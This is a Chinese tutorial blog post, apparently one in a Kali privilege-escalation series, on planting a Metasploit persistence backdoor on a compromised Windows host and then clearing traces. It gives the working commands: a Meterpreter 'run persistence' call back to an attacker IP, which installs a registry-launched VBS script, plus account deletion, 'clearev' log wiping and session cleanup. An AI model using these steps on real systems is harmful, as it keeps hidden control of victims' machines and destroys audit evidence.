当前位置:网站首页>【kali-权限提升】(4.2.7)社会工程学工具包:权限维持创建后门、清除痕迹
【kali-权限提升】(4.2.7)社会工程学工具包:权限维持创建后门、清除痕迹
2022-08-09 18:44:00 【黑色地带(崛起)】
目录
一、权限维持创建后门
1.1、概述:
获取目标系统的访问权限后,如果目标用户破坏了该连接(重启),所以需要在此之前,创建一个后门来恢复与目标主机的连接,而无需再进入目标系统。,此时使用后门将允许自动重新与目标系统建立连接。
1.2、过程:
激活Meterpreter会话
sessions -i 2
查看帮助命令
run persistence -h
结合不同的选项,创建一个持久后门
run persistence -U -A -i 10 - 8090 -r 192.168.190.149
输出的信息显示创建后门过程,在目标系统中创建了一个持久脚本(保存在C:\DOCUME~l\Test\LOCALS~I\Temp\lzXBdJvcpnD.vbs)并篡改注册表,该脚本会自动在目标主机上运行, 并将会建立第二个Meterpreter会话。
验证后门
关闭攻击会话,并重启目标机
监听目标,重启后能上线获得攻击会话
注
就算远控木马文件payload.exe被清除,但后门还在
如果后门脚本、注册表注册项清除,将无法再控制
二、清除痕迹
(如果提示:stdapi_sys_eventlog_clear:操作失败:访问被拒绝)
(操作前都是需要提权的,如getsystem提取,或者查看补丁信息后提权)
2.1、第一步:日志
为了不暴露攻击者的痕迹行为,需要清除系统事件
打开 Windows 事件查看器(可以看到日志信息)
直接在控制面板搜
2.2、第二步:清理额外信息
删除添加的账号
net user 添加的用户名 /del
退出目标服务器的shell
exit 或者 logoff
删除日志
clearev2.3、第三步:MSF清理
退出meterpreter shell
exit
查看所有的MSF连接
sessions
关闭所有的MSF链接(或指定的)
sessions -K边栏推荐
- 漏洞复现-redis未授权getshell
- Win10系统80端口被占用的解决方法
- Start cleaning up the long-term divers in the electronic chart development group again
- golang单元测试:testing包的基本使用
- ClickHouse一种高性能分布式join查询模型(Colocate Join)
- 基于CC2530 E18-MS1-PCB Zigbee DIY作品(三)
- AWS CodePipeLine 跨账号部署ECS
- DP-Differential Privacy概念介绍
- WPF 实现带蒙版的 MessageBox 消息提示框
- 阿里云架构师耗时几个月编写这份MySQL高可用和性能优化技术宝典
猜你喜欢
Tims中国上市进入倒计时:年亏3.8亿 估值降至14亿美元
![[] free column Android dynamic debugging GDB APP of safety](/img/e3/fd096ec64f682348cca9bbab1ec5bb.png)
[] free column Android dynamic debugging GDB APP of safety
What is the Treasure Project (TPC), a dark horse with wings in 2022!
DP-Differential Privacy概念介绍
Codesys结构变量编程应用(STRUCT类型)
WPF 实现带蒙版的 MessageBox 消息提示框
![[Free Column] Android Fragment Injection for Android Security](/img/bf/244e7095ce010bfea799d02395b419.png)
[Free Column] Android Fragment Injection for Android Security
数据分散情况的统计图-盒须图
『百日百题 · 基础篇』备战面试,坚持刷题 第五话——循环语句(2)!
Samsung's flagship discount is 1,800, Apple's discount is over 1,000, and the domestic flagship is only reduced by 500 to send beggars
随机推荐
[Free Column] Android Security for Peace Elite (FZ) APK Reverse Analysis
关于加强专业学位研究生课程体系建设的意见
基于CC2530 E18-MS1-PCB Zigbee DIY作品(三)
[Free column] APK dynamic reverse application of Android security [Three Smali injection methods]
Haven't tried line art videos this year??
基于CC2530 E18-MS1-PCB Zigbee DIY作品(二)
切绳子【洛谷P1577】【二分】
Leetcode 739.每日温度 单调栈
渗透测试-对新型内存马webshell的研究
AttributeError: module 'click' has no attribute 'get_os_args'
[] free column Android run Android, her - as command of safety
DP-Differential Privacy概念介绍
RT-Thread推荐入围国赛及群体挑战赛名单
基于CC2530 E18-MS1-PCB Zigbee DIY作品
Openharmony Lightweight System Experiment--GPIO Lighting
Fully automated machine learning modeling!The effect hangs the primary alchemist!
移动端,PC端,微信等常用平台和浏览器判断
How to suppress alarm storms?
competed中访问ref为undefined
全自动化机器学习建模!效果吊打初级炼丹师!